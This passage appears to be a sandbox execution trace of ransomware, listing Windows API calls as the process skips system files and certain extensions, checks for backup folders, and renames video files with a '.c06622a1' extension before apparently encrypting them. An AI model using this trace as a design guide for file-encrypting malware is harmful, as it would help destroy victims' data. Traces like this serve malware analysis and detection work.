halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.396] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.396] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.396] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.396] wcscpy (in: _Dest=0x32400d2, _Source="WLHz66im9n OAN9lvyaW.flv" | out: _Dest="WLHz66im9n OAN9lvyaW.flv") returned="WLHz66im9n OAN9lvyaW.flv" [0168.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv", dwFileAttributes=0x80) returned 1 [0168.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\wlhz66im9n oan9lvyaw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0168.397] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.397] ReadFile (in: hFile=0x1f4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.398] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xe5aeee41 [0168.398] RtlComputeCrc32 (PartialCrc=0xee41, Buffer=0x32e9a4, Length=0x80) returned 0xd590f268 [0168.398] RtlComputeCrc32 (PartialCrc=0xf268, Buffer=0x32e9a4, Length=0x80) returned 0x3b6c159a [0168.398] RtlComputeCrc32 (PartialCrc=0x159a, Buffer=0x32e9a4, Length=0x80) returned 0xe59b0aaa [0168.398] RtlComputeCrc32 (PartialCrc=0xaaa, Buffer=0x32e9a4, Length=0x80) returned 0x6f0e041d [0168.398] CloseHandle (hObject=0x1f4) returned 1 [0168.398] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.398] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv" [0168.398] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv") returned 0x51 [0168.398] wcscpy (in: _Dest=0x325010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.398] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\wlhz66im9n oan9lvyaw.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\wlhz66im9n oan9lvyaw.flv.c06622a1"), dwFlags=0x8) returned 1 [0168.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\WLHz66im9n OAN9lvyaW.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\wlhz66im9n oan9lvyaw.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f4 [0168.400] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.400] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3b00020 [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x354c2659 [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33d40d1d [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x30822bb [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b33c304 [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41ee3c8e [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7161a1a2 [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13179506 [0168.408] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x636d2e5e [0168.411] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3b00094, Length=0x80) returned 0xf055adde [0168.411] RtlComputeCrc32 (PartialCrc=0xadde, Buffer=0x3b00094, Length=0x80) returned 0x46f1a63 [0168.411] RtlComputeCrc32 (PartialCrc=0x1a63, Buffer=0x3b00094, Length=0x80) returned 0xa640ace8 [0168.411] RtlComputeCrc32 (PartialCrc=0xace8, Buffer=0x3b00094, Length=0x80) returned 0x7b43cb7e [0168.411] RtlComputeCrc32 (PartialCrc=0xcb7e, Buffer=0x3b00094, Length=0x80) returned 0x8ff471f2 [0168.411] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b00020) returned 1 [0168.411] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.411] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.412] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.412] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0168.412] _wcsicmp (_Str1="backup", _Str2="hMUWsCiYUPz2VTz") returned -6 [0168.412] wcslen (_String="backup") returned 0x6 [0168.412] _wcsicmp (_Str1="bak", _Str2="hMUWsCiYUPz2VTz") returned -6 [0168.412] wcslen (_String="bak") returned 0x3 [0168.412] _wcsicmp (_Str1="back", _Str2="hMUWsCiYUPz2VTz") returned -6 [0168.412] wcslen (_String="back") returned 0x4 [0168.412] _wcsicmp (_Str1="archive", _Str2="hMUWsCiYUPz2VTz") returned -7 [0168.412] wcslen (_String="archive") returned 0x7 [0168.412] _wcsicmp (_Str1="bckp", _Str2="hMUWsCiYUPz2VTz") returned -6 [0168.412] wcslen (_String="bckp") returned 0x4 [0168.412] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.414] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.414] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece100d0, ftCreationTime.dwHighDateTime=0x1d5dd3d, ftLastAccessTime.dwLowDateTime=0x78da52a0, ftLastAccessTime.dwHighDateTime=0x1d5d92c, ftLastWriteTime.dwLowDateTime=0x78da52a0, ftLastWriteTime.dwHighDateTime=0x1d5d92c, nFileSizeHigh=0x0, nFileSizeLow=0x6b94, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWaJyoZ8wC.avi", cAlternateFileName="HWAJYO~1.AVI")) returned 1 [0168.414] _wcsicmp (_Str1="HWaJyoZ8wC.avi", _Str2="README.c06622a1.TXT") returned -10 [0168.414] wcsstr (_Str="HWaJyoZ8wC.avi", _SubStr="README") returned 0x0 [0168.414] _wcsicmp (_Str1="autorun.inf", _Str2="HWaJyoZ8wC.avi") returned -7 [0168.415] wcslen (_String="autorun.inf") returned 0xb [0168.415] _wcsicmp (_Str1="boot.ini", _Str2="HWaJyoZ8wC.avi") returned -6 [0168.415] wcslen (_String="boot.ini") returned 0x8 [0168.415] _wcsicmp (_Str1="bootfont.bin", _Str2="HWaJyoZ8wC.avi") returned -6 [0168.415] wcslen (_String="bootfont.bin") returned 0xc [0168.415] _wcsicmp (_Str1="bootsect.bak", _Str2="HWaJyoZ8wC.avi") returned -6 [0168.415] wcslen (_String="bootsect.bak") returned 0xc [0168.415] _wcsicmp (_Str1="desktop.ini", _Str2="HWaJyoZ8wC.avi") returned -4 [0168.415] wcslen (_String="desktop.ini") returned 0xb [0168.415] _wcsicmp (_Str1="iconcache.db", _Str2="HWaJyoZ8wC.avi") returned 1 [0168.415] wcslen (_String="iconcache.db") returned 0xc [0168.415] _wcsicmp (_Str1="ntldr", _Str2="HWaJyoZ8wC.avi") returned 6 [0168.415] wcslen (_String="ntldr") returned 0x5 [0168.415] _wcsicmp (_Str1="ntuser.dat", _Str2="HWaJyoZ8wC.avi") returned 6 [0168.415] wcslen (_String="ntuser.dat") returned 0xa [0168.415] _wcsicmp (_Str1="ntuser.dat.log", _Str2="HWaJyoZ8wC.avi") returned 6 [0168.415] wcslen (_String="ntuser.dat.log") returned 0xe [0168.415] _wcsicmp (_Str1="ntuser.ini", _Str2="HWaJyoZ8wC.avi") returned 6 [0168.415] wcslen (_String="ntuser.ini") returned 0xa [0168.415] _wcsicmp (_Str1="thumbs.db", _Str2="HWaJyoZ8wC.avi") returned 12 [0168.415] wcslen (_String="thumbs.db") returned 0x9 [0168.415] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0168.415] wcslen (_String="386") returned 0x3 [0168.415] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0168.415] wcslen (_String="adv") returned 0x3 [0168.415] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0168.415] wcslen (_String="ani") returned 0x3 [0168.415] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0168.415] wcslen (_String="bat") returned 0x3 [0168.415] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0168.415] wcslen (_String="bin") returned 0x3 [0168.415] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0168.415] wcslen (_String="cab") returned 0x3 [0168.416] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0168.416] wcslen (_String="cmd") returned 0x3 [0168.416] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0168.416] wcslen (_String="com") returned 0x3 [0168.416] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0168.416] wcslen (_String="cpl") returned 0x3 [0168.416] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0168.416] wcslen (_String="cur") returned 0x3 [0168.416] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0168.416] wcslen (_String="deskthemepack") returned 0xd [0168.416] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0168.416] wcslen (_String="diagcab") returned 0x7 [0168.416] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0168.416] wcslen (_String="diagcfg") returned 0x7 [0168.416] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0168.416] wcslen (_String="diagpkg") returned 0x7 [0168.416] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0168.416] wcslen (_String="dll") returned 0x3 [0168.416] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0168.416] wcslen (_String="drv") returned 0x3 [0168.416] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0168.416] wcslen (_String="exe") returned 0x3 [0168.416] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0168.416] wcslen (_String="hlp") returned 0x3 [0168.416] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0168.416] wcslen (_String="icl") returned 0x3 [0168.416] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0168.416] wcslen (_String="icns") returned 0x4 [0168.416] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0168.416] wcslen (_String="ico") returned 0x3 [0168.416] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0168.416] wcslen (_String="ics") returned 0x3 [0168.417] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0168.417] wcslen (_String="idx") returned 0x3 [0168.417] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0168.417] wcslen (_String="ldf") returned 0x3 [0168.417] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0168.417] wcslen (_String="lnk") returned 0x3 [0168.417] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0168.417] wcslen (_String="mod") returned 0x3 [0168.417] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0168.417] wcslen (_String="mpa") returned 0x3 [0168.417] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0168.417] wcslen (_String="msc") returned 0x3 [0168.417] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0168.417] wcslen (_String="msp") returned 0x3 [0168.417] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0168.417] wcslen (_String="msstyles") returned 0x8 [0168.417] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0168.417] wcslen (_String="msu") returned 0x3 [0168.417] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0168.417] wcslen (_String="nls") returned 0x3 [0168.417] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0168.417] wcslen (_String="nomedia") returned 0x7 [0168.417] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0168.417] wcslen (_String="ocx") returned 0x3 [0168.417] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0168.417] wcslen (_String="prf") returned 0x3 [0168.417] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0168.417] wcslen (_String="ps1") returned 0x3 [0168.417] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0168.417] wcslen (_String="rom") returned 0x3 [0168.417] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0168.417] wcslen (_String="rtp") returned 0x3 [0168.418] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0168.418] wcslen (_String="scr") returned 0x3 [0168.418] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0168.418] wcslen (_String="shs") returned 0x3 [0168.418] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0168.418] wcslen (_String="spl") returned 0x3 [0168.418] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0168.418] wcslen (_String="sys") returned 0x3 [0168.418] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0168.418] wcslen (_String="theme") returned 0x5 [0168.418] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0168.418] wcslen (_String="themepack") returned 0x9 [0168.418] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0168.418] wcslen (_String="wpx") returned 0x3 [0168.418] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0168.418] wcslen (_String="lock") returned 0x4 [0168.418] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0168.418] wcslen (_String="key") returned 0x3 [0168.418] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0168.418] wcslen (_String="hta") returned 0x3 [0168.418] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0168.418] wcslen (_String="msi") returned 0x3 [0168.418] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0168.418] wcslen (_String="pdb") returned 0x3 [0168.418] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0168.418] wcslen (_String="sqlite") returned 0x6 [0168.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.418] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.418] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.419] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.419] wcscpy (in: _Dest=0x321009a, _Source="HWaJyoZ8wC.avi" | out: _Dest="HWaJyoZ8wC.avi") returned="HWaJyoZ8wC.avi" [0168.419] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi", dwFileAttributes=0x80) returned 1 [0168.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwajyoz8wc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0168.419] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.419] ReadFile (in: hFile=0x1c8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.420] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xd5b4f9a3 [0168.420] RtlComputeCrc32 (PartialCrc=0xf9a3, Buffer=0x32ec24, Length=0x80) returned 0x207db7b0 [0168.420] RtlComputeCrc32 (PartialCrc=0xb7b0, Buffer=0x32ec24, Length=0x80) returned 0x37b9f3da [0168.420] RtlComputeCrc32 (PartialCrc=0xf3da, Buffer=0x32ec24, Length=0x80) returned 0x61c9149a [0168.420] RtlComputeCrc32 (PartialCrc=0x149a, Buffer=0x32ec24, Length=0x80) returned 0x67eabf40 [0168.420] CloseHandle (hObject=0x1c8) returned 1 [0168.420] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.420] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi" [0168.420] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi") returned 0x37 [0168.420] wcscpy (in: _Dest=0x32200be, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.420] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwajyoz8wc.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwajyoz8wc.avi.c06622a1"), dwFlags=0x8) returned 1 [0168.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HWaJyoZ8wC.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwajyoz8wc.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0168.423] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.423] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3b90020 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e0e57d8 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fe13095 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f8f5049 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x599b767b [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4da6f9fa [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29d89fc4 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x754c5d93 [0168.432] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5011535f [0168.435] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3b90094, Length=0x80) returned 0x905e8b6c [0168.435] RtlComputeCrc32 (PartialCrc=0x8b6c, Buffer=0x3b90094, Length=0x80) returned 0x5773b491 [0168.435] RtlComputeCrc32 (PartialCrc=0xb491, Buffer=0x3b90094, Length=0x80) returned 0x644dc6b2 [0168.435] RtlComputeCrc32 (PartialCrc=0xc6b2, Buffer=0x3b90094, Length=0x80) returned 0xd74b71b9 [0168.435] RtlComputeCrc32 (PartialCrc=0x71b9, Buffer=0x3b90094, Length=0x80) returned 0x1407ea96 [0168.435] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b90020) returned 1 [0168.435] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.437] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.438] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725a6920, ftCreationTime.dwHighDateTime=0x1d5df16, ftLastAccessTime.dwLowDateTime=0xb2403e20, ftLastAccessTime.dwHighDateTime=0x1d5e1e6, ftLastWriteTime.dwLowDateTime=0xb2403e20, ftLastWriteTime.dwHighDateTime=0x1d5e1e6, nFileSizeHigh=0x0, nFileSizeLow=0x85ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAuWBm2A.avi", cAlternateFileName="")) returned 1 [0168.438] _wcsicmp (_Str1="PAuWBm2A.avi", _Str2="README.c06622a1.TXT") returned -2 [0168.438] wcsstr (_Str="PAuWBm2A.avi", _SubStr="README") returned 0x0 [0168.438] _wcsicmp (_Str1="autorun.inf", _Str2="PAuWBm2A.avi") returned -15 [0168.438] wcslen (_String="autorun.inf") returned 0xb [0168.438] _wcsicmp (_Str1="boot.ini", _Str2="PAuWBm2A.avi") returned -14 [0168.438] wcslen (_String="boot.ini") returned 0x8 [0168.438] _wcsicmp (_Str1="bootfont.bin", _Str2="PAuWBm2A.avi") returned -14 [0168.438] wcslen (_String="bootfont.bin") returned 0xc [0168.438] _wcsicmp (_Str1="bootsect.bak", _Str2="PAuWBm2A.avi") returned -14 [0168.438] wcslen (_String="bootsect.bak") returned 0xc [0168.438] _wcsicmp (_Str1="desktop.ini", _Str2="PAuWBm2A.avi") returned -12 [0168.438] wcslen (_String="desktop.ini") returned 0xb [0168.439] _wcsicmp (_Str1="iconcache.db", _Str2="PAuWBm2A.avi") returned -7 [0168.439] wcslen (_String="iconcache.db") returned 0xc [0168.439] _wcsicmp (_Str1="ntldr", _Str2="PAuWBm2A.avi") returned -2 [0168.439] wcslen (_String="ntldr") returned 0x5 [0168.439] _wcsicmp (_Str1="ntuser.dat", _Str2="PAuWBm2A.avi") returned -2 [0168.439] wcslen (_String="ntuser.dat") returned 0xa [0168.439] _wcsicmp (_Str1="ntuser.dat.log", _Str2="PAuWBm2A.avi") returned -2 [0168.439] wcslen (_String="ntuser.dat.log") returned 0xe [0168.439] _wcsicmp (_Str1="ntuser.ini", _Str2="PAuWBm2A.avi") returned -2 [0168.439] wcslen (_String="ntuser.ini") returned 0xa [0168.439] _wcsicmp (_Str1="thumbs.db", _Str2="PAuWBm2A.avi") returned 4 [0168.439] wcslen (_String="thumbs.db") returned 0x9 [0168.439] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0168.439] wcslen (_String="386") returned 0x3 [0168.439] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0168.439] wcslen (_String="adv") returned 0x3 [0168.439] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0168.439] wcslen (_String="ani") returned 0x3 [0168.439] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0168.440] wcslen (_String="bat") returned 0x3 [0168.440] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0168.440] wcslen (_String="bin") returned 0x3 [0168.440] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0168.440] wcslen (_String="cab") returned 0x3 [0168.440] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0168.440] wcslen (_String="cmd") returned 0x3 [0168.440] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0168.440] wcslen (_String="com") returned 0x3 [0168.440] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0168.440] wcslen (_String="cpl") returned 0x3 [0168.440] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0168.440] wcslen (_String="cur") returned 0x3 [0168.440] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0168.440] wcslen (_String="deskthemepack") returned 0xd [0168.440] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0168.440] wcslen (_String="diagcab") returned 0x7 [0168.440] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0168.440] wcslen (_String="diagcfg") returned 0x7 [0168.440] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0168.441] wcslen (_String="diagpkg") returned 0x7 [0168.441] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0168.441] wcslen (_String="dll") returned 0x3 [0168.441] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0168.441] wcslen (_String="drv") returned 0x3 [0168.441] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0168.441] wcslen (_String="exe") returned 0x3 [0168.441] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0168.441] wcslen (_String="hlp") returned 0x3 [0168.441] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0168.441] wcslen (_String="icl") returned 0x3 [0168.441] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0168.441] wcslen (_String="icns") returned 0x4 [0168.441] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0168.441] wcslen (_String="ico") returned 0x3 [0168.441] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0168.441] wcslen (_String="ics") returned 0x3 [0168.442] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0168.442] wcslen (_String="idx") returned 0x3 [0168.442] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0168.442] wcslen (_String="ldf") returned 0x3 [0168.442] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0168.443] wcslen (_String="lnk") returned 0x3 [0168.443] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0168.443] wcslen (_String="mod") returned 0x3 [0168.443] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0168.443] wcslen (_String="mpa") returned 0x3 [0168.443] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 